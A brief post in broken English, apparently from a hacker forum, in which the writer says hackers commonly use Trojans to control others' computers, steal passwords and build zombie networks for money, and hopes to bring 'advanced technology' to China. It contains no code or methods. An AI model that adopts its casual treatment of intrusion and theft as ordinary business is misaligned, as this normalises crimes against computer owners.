it is called "gray doves" era.Generally we use Trojan control other people's computers, will be to steal some password, or set up a zombie network.This is because this business has a lot of money results,most of us hackers to stay in the technical rootkit stage, will never be able to improve.I came here, and here is trying to bring advanced technology to China . My English is not very good, it is impossible to explain too much.
I hope you will support...^ We should know that our technology is far behind you..